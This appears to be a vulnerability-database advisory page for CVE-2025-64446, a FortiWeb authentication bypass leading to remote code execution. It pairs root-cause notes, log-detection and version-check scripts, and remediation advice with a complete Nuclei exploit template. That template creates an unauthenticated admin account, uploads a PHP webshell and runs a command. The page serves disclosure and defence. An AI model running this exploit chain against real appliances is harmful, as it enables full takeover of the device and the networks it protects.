[webapps] FortiWeb 8.0.2 - Remote Code Execution
CVE-2025-64446
FortiWeb contains an unauthenticated remote code execution vulnerability that can give an attacker complete control of the appliance (affected builds are listed below).

Critical · CVSS 9.8

📋 Basic vulnerability information

| CVE | CVE-2025-64446 |
|---|---|
| Vulnerability type | Remote code execution (reached through an authentication bypass) |
| Affected versions | FortiWeb 8.0.0 through 8.0.1 (8.0.2 is the first fixed 8.0 release; the 7.0 to 7.6 branches are also affected, see Fortinet advisory FG-IR-25-910) |
| Severity | Critical · CVSS 9.8 |
| Published | 2026-04-08 |
| Submitter | Mohammed Idrees Banyamer |
| Source | Exploit-DB |
🔬 Root cause

The FortiWeb management API does not properly canonicalize the request path. A relative path traversal (CWE-23, the classification in FG-IR-25-910) lets a request that never authenticated reach handlers reserved for administrator sessions, so the attacker can create an administrator account and then use any privileged function, which the exploit on this page chains into a file upload and command execution. The flaw is therefore an authentication bypass, not an input-validation bug in a command parameter; a filter for command-injection payloads does not address it.

🎯 Attack scenario

1. The attacker sends a crafted HTTP request to the FortiWeb management interface or REST API without any session; the traversal sequence steers it past the authentication check.
2. The request creates a new local administrator account.
3. The attacker logs in with that account and obtains a full administrative session.
4. Using administrative functions (in the exploit below: a file upload through the backup endpoint followed by a request to the uploaded file), the attacker runs an operating system command and, if desired, deletes the temporary account to hide the intrusion.

💥 Impact

An attacker can run arbitrary operating system commands remotely and take complete control of the appliance, which sits in front of the applications it protects: data exposure, service disruption and lateral movement into the networks behind it all follow.
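The sequence above, seen from the defender's side. The following is an added example, not part of the Exploit-DB entry or of the original page, that flags the exploitation pattern in access logs of the management interface. It assumes each request is logged as `<ISO-8601 timestamp> <client-ip> <method> <path> <status>` (a constructed format; adapt `parse_line()` to yours) and uses the endpoint paths that the exploit template on this page uses. Request bodies are normally not logged, so the rules key on the order and timing of management API calls rather than on the traversal string inside the JSON body.

```python
"""Detect the CVE-2025-64446 exploitation sequence in management-interface
access logs.

Added example, not from the Exploit-DB entry or the original page. The log
format and sample lines below are constructed; the endpoint paths are the ones
the page's exploit template uses.
"""
import re
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

LOGIN = "/api/v2.0/login"
USER_ADD = "/api/v2.0/user/local.add"
USER_DELETE = "/api/v2.0/user/local.delete"
CLEANUP_WINDOW = timedelta(minutes=10)   # add -> delete inside this window is suspicious

LINE_RE = re.compile(r"^(\S+) (\S+) ([A-Z]+) (\S+) (\d{3})$")

# Constructed sample: a legitimate admin session from 198.51.100.7, the exploit
# chain from 203.0.113.5, and a double-encoded traversal probe from 203.0.113.9.
SAMPLE_LOG = """\
2025-11-14T10:00:01Z 198.51.100.7 POST /api/v2.0/login 200
2025-11-14T10:00:09Z 198.51.100.7 GET /admin/ 200
2025-11-14T10:15:03Z 203.0.113.5 POST /api/v2.0/user/local.add 200
2025-11-14T10:15:04Z 203.0.113.5 POST /api/v2.0/login 200
2025-11-14T10:15:05Z 203.0.113.5 POST /api/v2.0/system/maintenance/backup 200
2025-11-14T10:15:06Z 203.0.113.5 GET /pwned.dat 200
2025-11-14T10:15:07Z 203.0.113.5 POST /api/v2.0/user/local.delete 200
2025-11-14T10:20:00Z 203.0.113.9 GET /api/v2.0/%252e%252e/%252e%252e/admin/ 404
"""

Finding = Tuple[str, str, str]   # (rule, client ip, raw path)


def parse_line(line: str) -> Optional[Dict]:
    """Parse one line of the assumed log format; None for anything else."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    ts, ip, method, path, status = m.groups()
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "ip": ip, "method": method, "path": path, "status": int(status)}


def normalize_path(path: str, rounds: int = 3) -> str:
    """Drop the query string, percent-decode repeatedly (catches %252e double
    encoding) and fold backslashes to slashes."""
    p = path.split("?", 1)[0]
    for _ in range(rounds):
        decoded = unquote(p)
        if decoded == p:
            break
        p = decoded
    return p.replace("\\", "/")


def has_traversal(path: str) -> bool:
    """True if any path segment is '..' after normalization."""
    return any(seg == ".." for seg in normalize_path(path).split("/"))


def detect(log_text: str) -> List[Finding]:
    findings: List[Finding] = []
    first_login: Dict[str, datetime] = {}   # ip -> first successful login
    added_at: Dict[str, datetime] = {}      # ip -> last admin-user creation
    for raw in log_text.splitlines():
        e = parse_line(raw)
        if e is None:
            continue
        path = normalize_path(e["path"])
        if has_traversal(e["path"]):
            findings.append(("traversal-in-path", e["ip"], e["path"]))
        ok_post = e["method"] == "POST" and e["status"] == 200
        if ok_post and path == LOGIN:
            first_login.setdefault(e["ip"], e["ts"])
        elif ok_post and path == USER_ADD:
            # The chain creates the administrator *before* it has any session.
            if e["ip"] not in first_login:
                findings.append(("user-add-before-login", e["ip"], e["path"]))
            added_at[e["ip"]] = e["ts"]
        elif ok_post and path == USER_DELETE:
            t = added_at.get(e["ip"])
            if t is not None and e["ts"] - t <= CLEANUP_WINDOW:
                findings.append(("short-lived-admin", e["ip"], e["path"]))
    return findings


if __name__ == "__main__":
    for rule, ip, path in detect(SAMPLE_LOG):
        print(f"{rule:24} {ip:15} {path}")
```

The `user-add-before-login` rule is the strong signal for this CVE: an administrator being created by a client that has never logged in is exactly what the bypass makes possible, while an authenticated admin creating users is routine. The traversal rule only sees the URL; traversal carried in a JSON body stays invisible unless the proxy logs bodies, which is why the timing rules exist.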
⚔️ Nuclei Exploit 模板
The following Nuclei v3 template runs the full exploit chain and can be used to verify the vulnerability. Note that it is not a passive check: it creates a local administrator, writes a file to the target and executes a command there. Step 5 removes the temporary account, but nothing removes the uploaded `pwned.dat`. The references and CVSS vector below match the CVE-2025-64446 data in the table above (the original template pointed at CVE-2025-64444 and carried an 8.1/AC:H vector that contradicted its own 9.8 rating).

```yaml
id: CVE-2025-64446-exploit

info:
  name: FortiWeb RCE Exploit - CVE-2025-64446
  author: your-nuclei-author
  severity: critical
  description: |
    Exploits CVE-2025-64446 in FortiWeb to achieve remote code execution via
    authentication bypass, path traversal and arbitrary file upload. The chain
    creates a temporary admin user, logs in, uploads a webshell, executes the
    configured command and finally deletes the temporary user.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-64446
    - https://fortiguard.fortinet.com/psirt/FG-IR-25-910
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-64446
    cwe-id: CWE-23   # relative path traversal; the authentication bypass is its consequence

variables:
  username: "pwnedadmin"
  password: "Pwned123!"
  cmd: "id"

http:
  - raw:
      # 1. Create a temporary administrator through the API without a session.
      - |+
        POST /api/v2.0/user/local.add HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"../../mkey": "{{username}}", "password": "{{password}}", "isadmin": "1", "status": "enable"}

      # 2. Log in with it; the session cookie is carried into the later requests.
      - |+
        POST /api/v2.0/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username": "{{username}}", "password": "{{password}}"}

      # 3. Upload the webshell through the backup endpoint.
      - |+
        POST /api/v2.0/system/maintenance/backup HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxyz

        ------WebKitFormBoundaryxyz
        Content-Disposition: form-data; name="upload-file"; filename="pwned.dat"
        Content-Type: application/octet-stream

        {{base64('<?php system("' + cmd + '"); ?>')}}
        ------WebKitFormBoundaryxyz--

      # 4. Request the uploaded file to run the command.
      - |+
        GET /pwned.dat HTTP/1.1
        Host: {{Hostname}}

      # 5. Remove the temporary administrator (the uploaded file is left behind).
      - |+
        POST /api/v2.0/user/local.delete HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"../../mkey": "{{username}}"}

    # Carry the session cookie from step 2 into steps 3-5.
    cookie-reuse: true

    # Matchers run against every response in the chain; a hit on "uid=" comes
    # from the command output in step 4.
    matchers:
      - type: word
        part: body
        words:
          - "uid="
          - "root:"
        condition: or

    # Extract the id(1) output line rather than the first token of any response.
    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '(uid=\d+\([^)]*\)[^\r\n]*)'
```

🔍 Nuclei detection template
The following template fingerprints the management interface and extracts a version string where one is exposed. It only identifies a FortiWeb instance and reports the version; it does not prove exploitability, and the version still has to be compared against the affected ranges in the Fortinet advisory.

```yaml
id: CVE-2025-64446-detection

info:
  name: FortiWeb Detection - CVE-2025-64446
  author: your-nuclei-author
  severity: critical
  description: |
    Fingerprints the FortiWeb management interface and extracts the version
    string, if exposed, so the result can be checked against the affected
    ranges for CVE-2025-64446 (authentication bypass via path traversal
    leading to remote code execution). Identification only; no exploitation.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-64446
    - https://fortiguard.fortinet.com/psirt/FG-IR-25-910
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-64446
    cwe-id: CWE-23

http:
  - method: GET
    path:
      - "{{BaseURL}}/"
      - "{{BaseURL}}/admin/"
      - "{{BaseURL}}/browse.do"
      - "{{BaseURL}}/login"
    redirects: true
    max-redirects: 2
    stop-at-first-match: true

    matchers:
      - type: word
        part: body
        words:
          - "FortiWeb"
          - "Fortinet"   # weak signal: also matches other Fortinet products
        condition: or

    # Version forms seen in banners: "FortiWeb-8.0.1", "FortiWeb 8.0.1", "v8.0.1".
    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - 'FortiWeb[- ]([\d.]+)'
          - 'v([\d.]+)'
        internal: false
```

🛡️ Remediation
Upgrade to a fixed release: FortiWeb 8.0.2 or later on the 8.0 branch, per Fortinet advisory FG-IR-25-910, which also lists the fixed releases for the 7.0, 7.2, 7.4 and 7.6 branches (the Exploit-DB title names 8.0.2, but that is the first fixed 8.0 release, not a vulnerable one). Until the upgrade is applied, disable HTTP and HTTPS management on internet-facing interfaces, or restrict the management interface to trusted networks. Because the flaw is an authentication bypass, a WAF rule that filters command-injection payloads does not mitigate it. Afterwards, audit the local administrator list and the management logs for accounts and API calls you did not make: a successful exploitation may have created and deleted an administrator and left an uploaded file behind.
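Deciding which builds need the upgrade is the comparison the detection template leaves to the operator. The following added Python script (not from the Exploit-DB entry, the templates or Fortinet) takes a banner or extractor string, parses the version and classifies it against the affected ranges. The ranges are the ones published in FG-IR-25-910 at the time of writing; re-check the advisory before acting on the result.

```python
"""Evaluate a FortiWeb version string against the CVE-2025-64446 affected ranges.

Added example; not part of the Exploit-DB entry, the Nuclei templates or
Fortinet's tooling. The affected/fixed ranges are those published in Fortinet
advisory FG-IR-25-910 at the time of writing; verify against the advisory.
"""
import re
from typing import Optional, Tuple

Version = Tuple[int, int, int]

# branch -> (first affected, last affected, first fixed), per FG-IR-25-910
AFFECTED_RANGES = {
    (8, 0): ((8, 0, 0), (8, 0, 1), (8, 0, 2)),
    (7, 6): ((7, 6, 0), (7, 6, 4), (7, 6, 5)),
    (7, 4): ((7, 4, 0), (7, 4, 9), (7, 4, 10)),
    (7, 2): ((7, 2, 0), (7, 2, 11), (7, 2, 12)),
    (7, 0): ((7, 0, 0), (7, 0, 11), (7, 0, 12)),
}

# Accepts "FortiWeb-8.0.1", "FortiWeb 7.6.4", "v7.4.9" or a bare "8.0.2",
# i.e. the forms the detection template's extractor can return.
VERSION_RE = re.compile(r"(?:FortiWeb[- ]?|\bv)?(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> Optional[Version]:
    """Return the first x.y.z version found in a banner/extractor string, or None."""
    m = VERSION_RE.search(text)
    if m is None:
        return None
    major, minor, patch = (int(part) for part in m.groups())
    return (major, minor, patch)


def fmt(v: Version) -> str:
    return ".".join(str(x) for x in v)


def assess(version: Version) -> Tuple[str, str]:
    """Classify a version as 'vulnerable', 'fixed' or 'unknown' with advice.

    Comparison is tuple-wise, so 7.4.10 sorts after 7.4.9; a string comparison
    would get that wrong.
    """
    rng = AFFECTED_RANGES.get(version[:2])
    if rng is None:
        return ("unknown", "branch not listed in FG-IR-25-910; consult the advisory")
    first, last, fixed = rng
    if first <= version <= last:
        return ("vulnerable", f"upgrade to {fmt(fixed)} or above")
    if version >= fixed:
        return ("fixed", f"{fmt(version)} is at or above the fixed release {fmt(fixed)}")
    return ("unknown", "version outside the documented range; consult the advisory")


def check_banner(text: str) -> Tuple[str, str]:
    """Banner or extractor text in, (status, advice) out."""
    v = parse_version(text)
    if v is None:
        return ("unknown", "no x.y.z version string found; fingerprint only")
    return assess(v)


if __name__ == "__main__":
    # Constructed inputs standing in for the detection template's extractor output.
    for banner in ["FortiWeb-8.0.1", "FortiWeb 8.0.2", "v7.4.9", "7.4.10", "FortiWeb", "6.4.3"]:
        print(f"{banner:16} -> {check_banner(banner)}")
```

Branches the advisory does not list (6.x and older) come back as `unknown` rather than `fixed`: those releases are out of support and need a migration, not a reassurance.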
📎 References

- https://nvd.nist.gov/vuln/detail/CVE-2025-64446
- https://fortiguard.fortinet.com/psirt/FG-IR-25-910

⚠️ This article is based on public vulnerability databases and is intended for security research and defensive reference only. Generated: 2026-05-07 07:26 | Source: Exploit-DB